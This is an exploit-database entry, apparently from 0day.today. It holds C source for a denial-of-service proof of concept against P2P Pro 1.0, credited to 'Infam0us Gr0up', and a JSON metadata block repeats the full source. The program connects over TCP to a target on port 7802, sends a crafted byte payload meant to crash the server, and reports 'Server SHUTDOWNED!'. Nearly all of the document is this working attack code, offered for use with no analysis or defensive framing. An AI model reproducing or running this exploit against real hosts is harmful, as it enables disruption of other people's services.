ID 1337DAY-ID-6028
Type zdt
Reporter basher13
Modified 2005-09-02T00:00:00
Description
Exploit for unknown platform in category dos / poc
===============================================
P2P Pro 1.0 (command) Denial of Service Exploit
===============================================
/*
P2P Pro Command DOS Exploit
------------------------------------
Infam0us Gr0up - Securiti Research
Info: infamous.2hell.com
Vendor URL: http://www.digital-revolution.org/P2PPro.html
*/
#include string.h
#include winsock2.h
#include stdio.h
#pragma comment(lib, "ws2_32.lib")
char doscore[] =
"\x3f\x3f\xbc\x59\x70 "
"\x32\x70\x3f\xe1 "
"\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x4f\x57\x4e\x45\x44\x2e\x74"
"\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;
if (argc < 2)
{
printf(" P2P Pro Command DOS Exploit \n", argv[0]);
printf(" --------------------------------------\n", argv[0]);
printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]);
printf("[-]Usage: %s [target] [port]\n", argv[0]);
printf("[?]Exam: %s localhost 7802\n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 7802;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}
printf(" P2P Pro Command DOS Exploit \n", argv[0]);
printf(" --------------------------------------\r\n\n", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target listen.. \n");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");
printf("[+] Server SHUTDOWNED!\n");
closesocket(inetdos);
WSACleanup();
return 0;
}
# 0day.today [2018-01-10] #
{"published": "2005-09-02T00:00:00", "id": "1337DAY-ID-6028", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category dos / poc", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-01-10T03:18:58", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-10T03:18:58", "rev": 2}, "vulnersScore": -0.0}, "type": "zdt", "lastseen": "2018-01-10T03:18:58", "edition": 2, "title": "P2P Pro 1.0 (command) Denial of Service Exploit", "href": "https://0day.today/exploit/description/6028", "modified": "2005-09-02T00:00:00", "bulletinFamily": "exploit", "viewCount": 15, "cvelist": [], "sourceHref": "https://0day.today/exploit/6028", "references": [], "reporter": "basher13", "sourceData": "===============================================\r\nP2P Pro 1.0 (command) Denial of Service Exploit\r\n===============================================\r\n\r\n\r\n\r\n/*\r\n P2P Pro Command DOS Exploit\r\n ------------------------------------\r\n Infam0us Gr0up - Securiti Research\r\n\r\n Info: infamous.2hell.com\r\n Vendor URL: http://www.digital-revolution.org/P2PPro.html\r\n\r\n*/\r\n\r\n#include string.h\r\n#include winsock2.h \r\n#include stdio.h \r\n\r\n#pragma comment(lib, \"ws2_32.lib\") \r\n\r\nchar doscore[] = \r\n\"\\x3f\\x3f\\xbc\\x59\\x70 \"\r\n\"\\x32\\x70\\x3f\\xe1 \"\r\n\"\\x2b\\x5c\\x3f\\xa6\\xeb\\xa6\"\r\n\"\\x50\\x46\\x2b\\x5c\\x3f\\xa6\\xeb\\xa6\"\r\n\"\\x50\\x4f\\x57\\x4e\\x45\\x44\\x2e\\x74\"\r\n\"\\x78\\x74\\x2b\\x5c\\x3f\\xa6\\xeb\\xa6\"\r\n\"\\x50\\x31\\x32\\x33\\x32\\x34\\x32\\x2e\\x6b\\x62\";\r\n\r\n\r\nint main(int argc, char *argv[]) \r\n{ \r\nWSADATA wsaData; \r\nWORD wVersionRequested; \r\nstruct hostent *pTarget; \r\nstruct sockaddr_in sock; \r\nchar *target; \r\nint port,bufsize; \r\nSOCKET inetdos; \r\n\r\nif (argc < 2) \r\n{ \r\nprintf(\" P2P Pro Command DOS Exploit \\n\", argv[0]);\r\nprintf(\" --------------------------------------\\n\", argv[0]);\r\nprintf(\" Infam0us Gr0up - Securiti Research\\n\\n\", argv[0]);\r\nprintf(\"[-]Usage: %s [target] [port]\\n\", argv[0]); \r\nprintf(\"[?]Exam: %s localhost 7802\\n\", argv[0]); \r\nexit(1); \r\n} \r\n\r\nwVersionRequested = MAKEWORD(1, 1); \r\nif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; \r\n\r\ntarget = argv[1]; \r\nport = 7802; \r\n\r\nif (argc >= 3) port = atoi(argv[2]); \r\nbufsize = 1024; \r\nif (argc >= 4) bufsize = atoi(argv[3]); \r\n\r\ninetdos = socket(AF_INET, SOCK_STREAM, 0); \r\nif(inetdos==INVALID_SOCKET) \r\n{ \r\nprintf(\"Socket ERROR \\n\"); \r\nexit(1); \r\n} \r\nprintf(\" P2P Pro Command DOS Exploit \\n\", argv[0]);\r\nprintf(\" --------------------------------------\\r\\n\\n\", argv[0]);\r\nprintf(\"Resolve host... \"); \r\nif ((pTarget = gethostbyname(target)) == NULL) \r\n{ \r\nprintf(\"FAILED \\n\", argv[0]); \r\nexit(1); \r\n} \r\nprintf(\"[OK]\\n \");\r\nmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); \r\nsock.sin_family = AF_INET; \r\nsock.sin_port = htons((USHORT)port); \r\n\r\nprintf(\"[+] Connecting... \"); \r\nif ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) \r\n{ \r\nprintf(\"FAILED\\n\"); \r\nexit(1); \r\n} \r\nprintf(\"[OK]\\n\");\r\nprintf(\"Target listen.. \\n\"); \r\nprintf(\"Sending bad procedure... \"); \r\nif (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) \r\n{ \r\nprintf(\"ERROR\\n\"); \r\nclosesocket(inetdos); \r\nexit(1); \r\n} \r\nprintf(\"[OK]\\n \");\r\nprintf(\"[+] Server SHUTDOWNED!\\n\"); \r\nclosesocket(inetdos); \r\nWSACleanup(); \r\nreturn 0; \r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "immutableFields": []}
{}
